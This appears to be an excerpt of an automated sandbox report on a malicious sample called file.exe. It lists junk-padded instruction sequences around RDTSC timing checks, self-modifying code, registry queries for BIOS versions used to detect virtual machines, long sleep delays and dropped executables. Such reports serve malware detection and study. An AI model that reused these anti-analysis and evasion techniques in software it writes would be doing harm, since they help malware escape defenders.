Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8084A second address: 4D80904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 jmp 00007FC134D1C056h 0x00000016 mov dword ptr [esi+34h], eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FC134D1C04Eh 0x00000020 jmp 00007FC134D1C055h 0x00000025 popfd 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC134D1C04Eh 0x0000002d and esi, 4C67DF18h 0x00000033 jmp 00007FC134D1C04Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007FC134D1C058h 0x0000003f add esi, 2040C978h 0x00000045 jmp 00007FC134D1C04Bh 0x0000004a popfd 0x0000004b popad 0x0000004c popad 0x0000004d mov eax, dword ptr [ebx+18h] 0x00000050 pushad 0x00000051 mov dx, si 0x00000054 push ecx 0x00000055 mov bl, 57h 0x00000057 pop esi 0x00000058 popad 0x00000059 mov dword ptr [esi+38h], eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80904 second address: 4D8090A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8090A second address: 4D80926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov ebx, 515E7308h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+1Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC134D1C04Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80926 second address: 4D8093E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8093E second address: 4D809A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C053h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+20h] 0x0000000c jmp 00007FC134D1C056h 0x00000011 mov dword ptr [esi+40h], eax 0x00000014 jmp 00007FC134D1C050h 0x00000019 lea eax, dword ptr [ebx+00000080h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC134D1C057h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D809A0 second address: 4D809B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov ecx, 68513407h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push 00000001h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D809B6 second address: 4D809BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D809BA second address: 4D809C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D809C0 second address: 4D80A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC134D1C050h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ebx, 31A897C4h 0x00000016 jmp 00007FC134D1C04Dh 0x0000001b popad 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FC134D1C053h 0x00000026 sub esi, 1B74838Eh 0x0000002c jmp 00007FC134D1C059h 0x00000031 popfd 0x00000032 call 00007FC134D1C050h 0x00000037 pop eax 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A42 second address: 4D80A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A48 second address: 4D80A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A4C second address: 4D80A6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC1350240D5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B25 second address: 4D80B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 02h 0x00000005 mov ecx, 12C16EC7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 mov dx, EF78h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B3E second address: 4D80B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FC1350240D0h 0x00000010 js 00007FC1A64E2C27h 0x00000016 jmp 00007FC1350240D0h 0x0000001b mov eax, dword ptr [ebp-0Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC1350240D7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B94 second address: 4D80C44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 3012FC5Ah 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+04h], eax 0x00000010 pushad 0x00000011 mov al, bh 0x00000013 pushfd 0x00000014 jmp 00007FC134D1C054h 0x00000019 or cx, 0DC8h 0x0000001e jmp 00007FC134D1C04Bh 0x00000023 popfd 0x00000024 popad 0x00000025 lea eax, dword ptr [ebx+78h] 0x00000028 jmp 00007FC134D1C056h 0x0000002d push 00000001h 0x0000002f jmp 00007FC134D1C050h 0x00000034 nop 0x00000035 jmp 00007FC134D1C050h 0x0000003a push eax 0x0000003b jmp 00007FC134D1C04Bh 0x00000040 nop 0x00000041 pushad 0x00000042 movzx eax, bx 0x00000045 call 00007FC134D1C051h 0x0000004a mov di, cx 0x0000004d pop esi 0x0000004e popad 0x0000004f lea eax, dword ptr [ebp-08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 call 00007FC134D1C04Bh 0x0000005a pop esi 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80C44 second address: 4D80CA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC1350240D9h 0x00000015 or esi, 004CDB16h 0x0000001b jmp 00007FC1350240D1h 0x00000020 popfd 0x00000021 mov eax, 692D6987h 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80CA4 second address: 4D80CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80CA8 second address: 4D80CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E25 second address: 4D80E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E8D second address: 4D80EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80EAA second address: 4D80F33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC1A61DA836h 0x0000000f jmp 00007FC134D1C04Eh 0x00000014 mov eax, dword ptr [ebp-14h] 0x00000017 pushad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FC134D1C04Ch 0x0000001f adc esi, 760242D8h 0x00000025 jmp 00007FC134D1C04Bh 0x0000002a popfd 0x0000002b jmp 00007FC134D1C058h 0x00000030 popad 0x00000031 jmp 00007FC134D1C052h 0x00000036 popad 0x00000037 mov ecx, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FC134D1C04Ah 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F33 second address: 4D80F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F37 second address: 4D80F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F3D second address: 4D80F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F43 second address: 4D80F58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, bx 0x00000011 movsx edx, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81089 second address: 4D8108F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8108F second address: 4D810B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 7F599D41h 0x00000008 mov ax, CC7Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esi+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC134D1C052h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D810B7 second address: 4D810BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D810BD second address: 4D810ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f call 00007FC134D1C056h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D810ED second address: 4D8110F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+08h] 0x00000009 pushad 0x0000000a pushad 0x0000000b mov cx, bx 0x0000000e push ebx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov edi, 30593F06h 0x00000016 popad 0x00000017 mov dword ptr [edx+08h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e pop edx 0x0000001f push ecx 0x00000020 pop edi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8110F second address: 4D8117D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC134D1C04Dh 0x00000009 adc si, B866h 0x0000000e jmp 00007FC134D1C051h 0x00000013 popfd 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+0Ch] 0x0000001d jmp 00007FC134D1C053h 0x00000022 mov dword ptr [edx+0Ch], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007FC134D1C052h 0x0000002e sbb cx, DA68h 0x00000033 jmp 00007FC134D1C04Bh 0x00000038 popfd 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8117D second address: 4D811A2 instructions: 0x00000000 rdtsc 0x00000002 mov ah, E8h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d jmp 00007FC1350240CCh 0x00000012 mov dword ptr [edx+10h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx ebx, ax 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D811A2 second address: 4D8123F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov dl, 74h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+14h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC134D1C054h 0x00000014 or cx, B258h 0x00000019 jmp 00007FC134D1C04Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [edx+14h], eax 0x00000023 pushad 0x00000024 mov bh, E7h 0x00000026 jmp 00007FC134D1C04Ch 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+18h] 0x0000002f jmp 00007FC134D1C050h 0x00000034 mov dword ptr [edx+18h], eax 0x00000037 jmp 00007FC134D1C050h 0x0000003c mov eax, dword ptr [esi+1Ch] 0x0000003f jmp 00007FC134D1C050h 0x00000044 mov dword ptr [edx+1Ch], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FC134D1C057h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8123F second address: 4D81262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 61FC479Ah 0x00000008 mov ecx, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+20h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC1350240CFh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81262 second address: 4D81268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81268 second address: 4D8126D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8136D second address: 4D81371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81371 second address: 4D81380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81380 second address: 4D813AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 664Ah 0x00000007 call 00007FC134D1C04Bh 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ax, word ptr [esi+32h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC134D1C052h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D813AE second address: 4D813B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D813B4 second address: 4D813B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D813B8 second address: 4D81411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c jmp 00007FC1350240D9h 0x00000011 mov eax, dword ptr [esi+34h] 0x00000014 jmp 00007FC1350240CEh 0x00000019 mov dword ptr [edx+34h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FC1350240CDh 0x00000025 jmp 00007FC1350240CBh 0x0000002a popfd 0x0000002b mov ah, 97h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81411 second address: 4D81416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81416 second address: 4D814AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, al 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f pushad 0x00000010 push ebx 0x00000011 mov edi, ecx 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007FC1350240D7h 0x0000001a and cx, 6F1Eh 0x0000001f jmp 00007FC1350240D9h 0x00000024 popfd 0x00000025 popad 0x00000026 jne 00007FC1A64E237Bh 0x0000002c pushad 0x0000002d mov dx, ax 0x00000030 popad 0x00000031 or dword ptr [edx+38h], FFFFFFFFh 0x00000035 pushad 0x00000036 push eax 0x00000037 movsx edi, cx 0x0000003a pop eax 0x0000003b mov di, 565Ch 0x0000003f popad 0x00000040 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000044 pushad 0x00000045 push edi 0x00000046 jmp 00007FC1350240CCh 0x0000004b pop esi 0x0000004c mov bh, D6h 0x0000004e popad 0x0000004f or dword ptr [edx+40h], FFFFFFFFh 0x00000053 pushad 0x00000054 mov esi, 51E43EAFh 0x00000059 push esi 0x0000005a jmp 00007FC1350240CBh 0x0000005f pop eax 0x00000060 popad 0x00000061 pop esi 0x00000062 pushad 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DA3 second address: 4D50DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DA7 second address: 4D50DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DAD second address: 4D50DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f call 00007FC134D1C04Ah 0x00000014 mov dx, ax 0x00000017 pop eax 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FC134D1C04Dh 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DF0 second address: 4D50DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D603F9 second address: 4D60409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC134D1C04Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60409 second address: 4D60482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FC1350240CCh 0x0000000f mov ax, EC71h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FC1350240CCh 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d jmp 00007FC1350240CEh 0x00000022 pushfd 0x00000023 jmp 00007FC1350240D2h 0x00000028 sbb ecx, 4F1C8BA8h 0x0000002e jmp 00007FC1350240CBh 0x00000033 popfd 0x00000034 popad 0x00000035 push dword ptr [ebp+04h] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC1350240D5h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60482 second address: 4D60488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60488 second address: 4D6048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6048C second address: 4D60490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81876 second address: 4D81884 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81884 second address: 4D81888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81888 second address: 4D81897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81897 second address: 4D818DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FC134D1C057h 0x00000010 mov bh, al 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx esi, bx 0x0000001a push edx 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D818DA second address: 4D818EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240D1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 825A4E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9CC5CE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9CAE7B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A51D81 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAD2A9 rdtsc 0_2_00AAD2A9
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1503
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1344
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1523
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1389
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]
Source: C:\Users\user\Desktop\file.exe TID: 7568 Thread sleep count: 58 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7568 Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 45 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep time: -90045s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7484 Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7484 Thread sleep count: 74 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7484 Thread sleep count: 57 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7484 Thread sleep count: 87 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7484 Thread sleep count: 50 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7484 Thread sleep count: 50 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7548 Thread sleep count: 1503 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7548 Thread sleep time: -3007503s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7552 Thread sleep count: 1344 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7552 Thread sleep time: -2689344s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7576 Thread sleep count: 39 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7576 Thread sleep time: -78039s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7560 Thread sleep count: 1523 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7560 Thread sleep time: -3047523s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7564 Thread sleep count: 1389 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7564 Thread sleep time: -2779389s >= -30000s
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004176E7 FindFirstFileExW,0_2_004176E7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B7794E FindFirstFileExW,0_2_04B7794E
